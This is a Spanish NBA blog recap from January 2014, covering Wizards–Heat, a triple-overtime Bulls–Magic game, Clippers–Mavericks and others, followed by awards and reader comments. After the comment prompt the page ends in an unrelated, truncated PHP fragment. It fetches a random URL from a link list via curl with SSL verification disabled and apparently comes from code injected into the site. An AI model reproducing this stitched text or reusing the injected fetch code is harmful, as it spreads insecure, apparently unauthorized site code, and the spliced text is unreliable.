La Crónica: Prórrogas y remontadas

16 de January de 2014 por Simon

Los 12 partidos que se disputaron ayer en la NBA nos dejaron muchísimas cosas que contar. Esperemos no dejarnos ninguna.

Tremendo correctivo el que recibieron  los actuales campeones durante la primera parte de su partido en la capital de los EEUU. Los Wizards arrasaron en un  primer cuarto en el que su vetnaja llegó a los 25 puntos ante la cara de incredulidad de Lebron James, cara que se convertía en poema cuando en el segundo cuarto la diferencia llegó a los 30. Tras el descanso Miami despertó de su letargo y consiguió reducir la ventaja por debajo de la decena. Así, con los Heat en pleno ascenso y una ventaja de sólo 9 puntos los Wizards parecían destinados a sufrir una de las mayores remontadas nunca vistas pero Wall y Beal se encargaron de poner las cosas en su sitio y cerrar el partido sin sufrir en el último cuarto (97-114). Lo positivo del partido para los Heat fue el debut de un Greg Oden tremendamente efectivo en los pocos minutos que disputó.

Uno de los equipos más en forma del campeonato, Toronto, vio cortada su buena racha en su visita al TD Garden principalmente por culpa de un mal tercer cuarto que les hizo ir a remolque el resto del encuentro (83-88). Con esta victoria los Celtics logran romper una racha de 9 derrotas consecutivas y suman su primera victoria de 2014.

El partido más emocionante de la jornada fue la visita de Chicago al Amway Center de Orlando.  Lo que parecía en un principio uno de los partidos más insulsos de la jornada se terminó convirtiendo en un trepidante duelo gracias a las tres prórrogas que se disputaron. Cada equipo dispuso de una última bola con empate para llevarse la victoria pero ninguno aprovechó la oportunidad. En la segunda prórroga un triplazo de Glen Davis forzó la definitiva en la que los Bulls por fin lograron imponerse gracias a una canasta del rookie Tony Snell y un mal ataque de Orlando (128-126). Jimmy Butler batió un record de la franquicia al jugar ¡¡60 minutos!! Seguro que anoche durmió bien… 

Muchos duelos interesantes en el Oeste ayer con la disputa por el cuarto puesto de la conferencia como interés principal. El más igualado a priori era la visita de los Mavericks a Los Angeles para medirse a los Clippers. Tras un partido de idas y venidas  se llegó al último cuarto con sólo 2 puntos de ventaja para los locales. Un gran inicio de cuarto de Dallas, liderados por Brandan Wright, puso a los Mavs con 17 puntos de ventaja a falta de 5 minutos. El partido parecía acabado pero nada más lejos de la realidad.  A partir de ese momento los Clippers desataron una tormenta perfecta y consiguieron darle la vuelta al partido con un parcial de 23-4  a base de triples y tiros libresque certificó la victoria (127-129). Una vez más los Mavericks son protagonistas de una polémica arbitral en la última jugada por una dudosa falta pitada sobre Jamal Crawford que provocó las protestas de los jugadores de Dallas. Tampoco fallaron los Rockets en su visita a New Orleans, aunque a punto estuvieron de caer derrotados y es que los Pelicans estuvieron siempre por delante en el marcador hasta que Harden, a menos de 30 segundos para el final, puso por delante a los suyos de manera definitiva (103-100). Si fallaron en cambio los Warriors que se vieron sorprendidos por los Nuggets. El duelo entre dos de los equipos más ofensivos de la liga no defraudó a nadie como demuestra el montante de puntos total. Nate Robinson fue el factor diferencial que, con 14 puntos en el último cuarto, desequilibró la balanza del lado visitante (123-116).

El resto de duelos del Oeste tuvieron un nivel muy alto también. En San Antonio, se enfrentaban el líder y el colista de la conferencia en lo que era el duelo más desequilibrado de la jornada. Sin embargo, los Jazz no perdieron la cara al duelo y nunca bajaron los brazos pero no consiguieron evitar que San Antonio lograra una victoria más cómoda de lo que muestra el marcador final (105-109). Su inmediato perseguidor, los Portland Trail Blazers, no pierde comba y liderados una vez más por su pareja estelar vencieron a unos Cavs que pusieron las cosas dificilísimas hasta el último momento a pesar de lo que muestra el marcador pues a falta de 2 minutos el partido estaba igualado (96-108). Cerrando el resumen de los equipos de Play Off del Oeste tenemos a los Suns que lograron la tercera victoria de la temporada ante Lakers con un espectacular Goran Dragic que coqueteó con el triple doble (114-121).

En Milwaukee, los Bucks sufrieron una nueva derrota a pesar de plantar cara a unos Grizzlies que van directos hacia los Play Off.  Tras dejar a los Bucks en unos pírricos 10 puntos en el primer cuarto, parecía que Memphis iba a tener las cosas fáciles pero los Bucks se enmendaron y obligaron a su rival a pelear hasta el último segundo en el que Milwaukee tuvo bola para empatar pero perdió la oportunidad (82-77). Otro equipo que tuvo triple para empatar pero no lo logró fueron los Bobcats que perdieron en Philadelphia en un disputado encuentro (92-95).  Por último, los Kings sorprendieron a domicilio a los Timberwolves aprovechando que una vez más Kevin Love estuvo muy sólo (111-108).

PREMIOS

MVP: Joakim Noah, Lamarcus Aldridge, Rudy Gay… Soy incapaz de decidirme por uno de ellos. 26 puntos, 19 puntos, 6 asistencias, 2 robos y 2 tapones para el de los Bulls; 32 puntos, 18 rebotes y 4 asistencias para el de los Blazers, y 33 puntos, 5 rebotes, 6 asistencias y 2 robos para el de los Kings. Trio de ases.

Rookie: Partidazo de Victor Oladipo. Jugó 57 minutos en los que anotó 33 puntos y repartió 8 asistencias. Lástima de sus 8 pérdidas. También hemos de destacar el 20-8-7 de Michael Carter-Williams y no podemos olvidar los 15 puntos, 7 rebotes y 2 robos de Tony Snell o los 17 puntos y 11 asistencias de Trey Burke.

Sorpresa: JJ Redick ha vuelto en plena forma de su lesión. Ayer cogió su fusil, anotó 7 triples de 9 intentos y acabó con 33 puntos, 5 asistencias y 2 robos. Jared Sullinger se fue a los 25 puntos y 20 rebotes ante los Raptors.

Decepción: Marc Gasol demostró en los 14 minutos que estuvo en el campo que todavía no está al 100%. Falló los 4 tiros que intentó y perdió 2 balones. NO mucho mejor lo hizo su compañero Zach Randolph que se quedó en 6 puntos tras un 2 de 10 en TC. Aún así, los Grizzlies se llevaron la victoria.

Esfuerzo en vano: Los 35 puntos y 6 asistencias de Eric Gordon no pudieron evitar la séptima derrota consecutiva de los Pelicans.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Reconozco que los resultados que se dan ahora mismo en la NBA me tienen confundido y me tocan el bolsillo (xD)

    Enésima decepción de los Wolves.Les viene un calendario de 5 partidos contra equipos del oeste que para mí es una reválida para ellos.Queda muchísima temporada pero es que van a tener que darse empujones con todos los que están compitiendo por entrar en PO,y al único que veo bajando es a Phoenix.Y yo no los veo malos para nada,y cuando se dice que están escasos de banquillo OK,pero comparas con otros equipos y ves que el roster de Minny es mejor,no es la razón fundamental que justifique su bagaje hasta ahora.No sé si es falta de química,que están mal entrenados…y veo fin de ciclo en verano.A saber si Love demandará ya el traspaso,pero tengo claro que Adelman no me parece capacitado para la nave y Ricky no puede tener bula permanente,tiene que mejorar su juego.

      Citar

  2. GreenPride dice:
    #2

    Vaya como está el patio… Los Heat recuperaron lesionados sólo para ver cómo los Wizards les sacaban los colores durante la primera parte. Hasta 34 se fue la diferencia con unos Heat que pasaban literalmente del partido. Bien los de Washington pero nula defensa y increible balance defensivo de los Heat. Es de traca ver la “no-defensa” que practica el bueno de Flash Wade en estos tiempos. Sus defendidos le hincharon a puertas atrás ante la pasividad de Wade. Luego viendo la paliza sonrojante se pusieron el mono en la segunda parte para llegar a bajar la diferencia a 9 pero yo no pudieron más. Se están dejando partidos en esta época de la temporada y se les están empezando a escapar los Pacers en la búsqueda de la ventaja de campo… importante a tenor de las últimas finales de conferencia. Lo único positivo ver a Greg Oden de nuevo en una cancha y aportando bastante en el tiempo que jugó. Si esta vez sí le respetan las lesiones sería una aportación tremenda para los campeones.
    Del resto, lucha a muerte en el Oeste, como siempre. Vienen remontando Memphis y Denver y creo que ambos acabaran echando de los Playoffs a Phoenix y Dallas en la segunda parte de la temporada pero seguro que no va a ser una lucha sencilla. A Minny se le empieza a escapar el caballo y tienen que reaccionar ya si no quieren terminar la temporada fuera de playoffs lo que sería desastroso para ellos.

      Citar

  3. Denise dice:
    #3

    Una corrección rápida. Oladipo anotó 35 puntos.

    A pesar de la derrota, ésta sí es la imagen que deben dar los Magic, peleando hasta el final sin Afflalo y Vucevic. Kylq O’Quinn 12-7-3 tapones en 23 minutos, aver si Vaughn se da cuenta de una vez que los minutos que le da a Maxiell debe dárselos a este chaval.

    Temporadón de Redick,.. y los Clippers cada vez los veo más favoritos al anillo.

      Citar

  4. The wolf dice:
    #4

    La foto que habeis puesto de LeBron es para ponerla en un poster bien grande

      Citar

  5. rumbero dice:
    #5

    1 hora de partido para Butler, que barbaridad. Eso es más de lo que han jugado Cole Aldrich o Thabeet en toda la temporada. Van con un 4-1 desde que se fue Deng (aunque contra rivales “menores”) pero vaya, que si desde los despachos sobrevolaba la idea de tankear con Thibs y los suyos lo llevan claro.

    Y por otro lado, que despelote de partido en Oakland. Habría que meter a todos los Nuggets en el MVP, con 4 tios por encima de los 20 puntos y tirando por encima del 50%, pero lo de Robinson en el último cuarto es cosa fina con 12 puntos seguidos. Obligado verlo para los amantes de Nate. Y clave también Hickson con 4 acciones al final para amarrar el partido (aparte de los 24 rebotes que se ha llevado para casa)

      Citar

  6. Juanba dice:
    #6

    Creo que los Wizards, a mi modo de ver, son uno de los equipos más infravalorados del campeonato. Juegan como equipo, aportan los veteranos (Nene) y el ‘sophomore’ Bradley Beal cada día me gusta más. Wall no hace partidos malos nunca y creo que los ‘center’ son los únicos que este año no están a la altura del resto, sobre todo Seraphin… En el Este tendrán Playoffs seguro y a ver hasta donde llegan…

      Citar

  7. Blade Petrovic dice:
    #7

    Por ahora partidazo de los Nets, moviendo muy bien el balón y buscando casi siempre a hombres abiertos. JoJo partidazo con dos buzzers-beaters y 29 puntos. Los Hawks bastante espesos y ojito que Korver aún no ha anotado un triple…

      Citar

  8. Sancho88 dice:
    #8

    Estoy viendo a los Pacers contra los Knicks. Joder, más pinta de campeones no pueden tener estos tíos. Es que ya les tiene que tocar la suerte esta temporada. Después de dos años haciendo las cosas realmente bien, este año parece que serán campeones de conferencia y Miami despierta muchas dudas. Claro que LeBron puede contra todo y todos, pero el engranaje de Indiana a 7 partidos con 4 de ellos en casa… puede ser definitivo. Sea como fuere, el Oeste cada vez es más fiero, pero da la sensación de que el campeón volverá a salir de la final Indiana-Miami. Este año creo que ya lo merecen por fin los Pacers

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>